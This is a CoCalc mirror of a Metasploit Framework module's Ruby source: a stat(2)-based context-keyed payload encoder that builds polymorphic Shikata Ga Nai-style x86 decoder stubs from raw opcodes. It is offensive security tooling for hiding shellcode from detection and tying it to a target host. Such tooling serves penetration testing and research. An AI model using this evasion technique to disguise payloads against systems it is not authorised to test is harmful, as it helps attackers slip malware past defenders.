CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/encoders/x86/context_stat.rb
Views: 1904
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'rex/poly'
7
8
class MetasploitModule < Msf::Encoder::XorAdditiveFeedback
9
10
# Manual ranking because the stat(2) key is generated and supplied
11
# manually.
12
13
Rank = ManualRanking
14
15
def initialize
16
super(
17
'Name' => 'stat(2)-based Context Keyed Payload Encoder',
18
'Description' => %q{
19
This is a Context-Keyed Payload Encoder based on stat(2)
20
and Shikata Ga Nai.
21
},
22
'Author' => 'Dimitris Glynos',
23
'Arch' => ARCH_X86,
24
'License' => MSF_LICENSE,
25
'Decoder' =>
26
{
27
'KeySize' => 4,
28
'BlockSize' => 4
29
})
30
31
register_options(
32
[
33
OptString.new('STAT_KEY', [ true,
34
"STAT key from target host (see tools/context/stat-key utility)",
35
"0x00000000" ]),
36
OptString.new('STAT_FILE', [ true, "name of file to stat(2)", "/bin/ls" ]),
37
])
38
end
39
40
def obtain_key(buf, badchars, state)
41
state.key = datastore['STAT_KEY'].hex
42
return state.key
43
end
44
45
#
46
# Generates the shikata decoder stub.
47
#
48
def decoder_stub(state)
49
# If the decoder stub has not already been generated for this state, do
50
# it now. The decoder stub method may be called more than once.
51
if (state.decoder_stub == nil)
52
# Shikata will only cut off the last 1-4 bytes of it's own end
53
# depending on the alignment of the original buffer
54
cutoff = 4 - (state.buf.length & 3)
55
block = keygen_stub() + generate_shikata_block(state, state.buf.length + cutoff, cutoff) || (raise BadGenerateError)
56
57
# Take the last 1-4 bytes of shikata and prepend them to the buffer
58
# that is going to be encoded to make it align on a 4-byte boundary.
59
state.buf = block.slice!(block.length - cutoff, cutoff) + state.buf
60
61
# Cache this decoder stub. The reason we cache the decoder stub is
62
# because we need to ensure that the same stub is returned every time
63
# for a given encoder state.
64
state.decoder_stub = block
65
end
66
67
state.decoder_stub
68
end
69
70
protected
71
def keygen_stub
72
fname = datastore['STAT_FILE']
73
flen = fname.length
74
75
payload =
76
"\xd9\xee" + # fldz
77
"\xd9\x74\x24\xf4" + # fnstenv -0xc(%esp)
78
"\x5b" + # pop %ebx
79
Rex::Arch::X86.jmp_short(flen) + # jmp over
80
fname + # the filename
81
"\x83\xc3\x09" + # over: add $9, %ebx
82
"\x8d\x53" + # lea filelen(%ebx), %edx
83
Rex::Arch::X86.pack_lsb(flen) + #
84
"\x31\xc0" + # xor %eax,%eax
85
"\x88\x02" + # mov %al,(%edx)
86
"\x8d\x4c\x24\xa8" + # lea -0x58(%esp),%ecx
87
"\xb0\xc3" + # mov $0xc3, %al
88
"\xcd\x80" + # int $0x80
89
"\x8b\x41\x2c" + # mov 0x2c(%ecx),%eax
90
"\x33\x41\x48" # xor 0x48(%ecx),%eax
91
end
92
93
#
94
# Returns the set of FPU instructions that can be used for the FPU block of
95
# the decoder stub.
96
#
97
def fpu_instructions
98
fpus = []
99
100
0xe8.upto(0xee) { |x| fpus << "\xd9" + x.chr }
101
0xc0.upto(0xcf) { |x| fpus << "\xd9" + x.chr }
102
0xc0.upto(0xdf) { |x| fpus << "\xda" + x.chr }
103
0xc0.upto(0xdf) { |x| fpus << "\xdb" + x.chr }
104
0xc0.upto(0xc7) { |x| fpus << "\xdd" + x.chr }
105
106
fpus << "\xd9\xd0"
107
fpus << "\xd9\xe1"
108
fpus << "\xd9\xf6"
109
fpus << "\xd9\xf7"
110
fpus << "\xd9\xe5"
111
112
# This FPU instruction seems to fail consistently on Linux
113
#fpus << "\xdb\xe1"
114
115
fpus
116
end
117
118
#
119
# Returns a polymorphic decoder stub that is capable of decoding a buffer
120
# of the supplied length and encodes the last cutoff bytes of itself.
121
#
122
def generate_shikata_block(state, length, cutoff)
123
# Declare logical registers
124
key_reg = Rex::Poly::LogicalRegister::X86.new('key', 'eax')
125
count_reg = Rex::Poly::LogicalRegister::X86.new('count', 'ecx')
126
addr_reg = Rex::Poly::LogicalRegister::X86.new('addr')
127
128
# Declare individual blocks
129
endb = Rex::Poly::SymbolicBlock::End.new
130
131
# FPU blocks
132
fpu = Rex::Poly::LogicalBlock.new('fpu', *fpu_instructions)
133
fnstenv = Rex::Poly::LogicalBlock.new('fnstenv', "\xd9\x74\x24\xf4")
134
135
# Get EIP off the stack
136
popeip = Rex::Poly::LogicalBlock.new('popeip',
137
Proc.new { |b| (0x58 + b.regnum_of(addr_reg)).chr })
138
139
# Clear the counter register
140
clear_register = Rex::Poly::LogicalBlock.new('clear_register',
141
"\x31\xc9",
142
"\x29\xc9",
143
"\x33\xc9",
144
"\x2b\xc9")
145
146
# Initialize the counter after zeroing it
147
init_counter = Rex::Poly::LogicalBlock.new('init_counter')
148
149
# Divide the length by four but ensure that it aligns on a block size
150
# boundary (4 byte).
151
length += 4 + (4 - (length & 3)) & 3
152
length /= 4
153
154
if (length <= 255)
155
init_counter.add_perm("\xb1" + [ length ].pack('C'))
156
else
157
init_counter.add_perm("\x66\xb9" + [ length ].pack('v'))
158
end
159
160
# Key initialization block
161
162
# Decoder loop block
163
loop_block = Rex::Poly::LogicalBlock.new('loop_block')
164
165
xor = Proc.new { |b| "\x31" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
166
xor1 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
167
xor2 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
168
add = Proc.new { |b| "\x03" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
169
add1 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
170
add2 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
171
sub4 = Proc.new { |b| "\x83" + (0xe8 + b.regnum_of(addr_reg)).chr + "\xfc" }
172
add4 = Proc.new { |b| "\x83" + (0xc0 + b.regnum_of(addr_reg)).chr + "\x04" }
173
174
loop_block.add_perm(
175
Proc.new { |b| xor1.call(b) + add1.call(b) + sub4.call(b) },
176
Proc.new { |b| xor1.call(b) + sub4.call(b) + add2.call(b) },
177
Proc.new { |b| sub4.call(b) + xor2.call(b) + add2.call(b) },
178
Proc.new { |b| xor1.call(b) + add1.call(b) + add4.call(b) },
179
Proc.new { |b| xor1.call(b) + add4.call(b) + add2.call(b) },
180
Proc.new { |b| add4.call(b) + xor2.call(b) + add2.call(b) })
181
182
# Loop instruction block
183
loop_inst = Rex::Poly::LogicalBlock.new('loop_inst',
184
"\xe2\xf5")
185
186
# Define block dependencies
187
fnstenv.depends_on(fpu)
188
popeip.depends_on(fnstenv)
189
init_counter.depends_on(clear_register)
190
loop_block.depends_on(popeip, init_counter)
191
loop_inst.depends_on(loop_block)
192
193
# Generate a permutation saving the EAX, ECX and ESP registers
194
loop_inst.generate([
195
Rex::Arch::X86::EAX,
196
Rex::Arch::X86::ESP,
197
Rex::Arch::X86::ECX ], nil, state.badchars)
198
end
199
end
200
201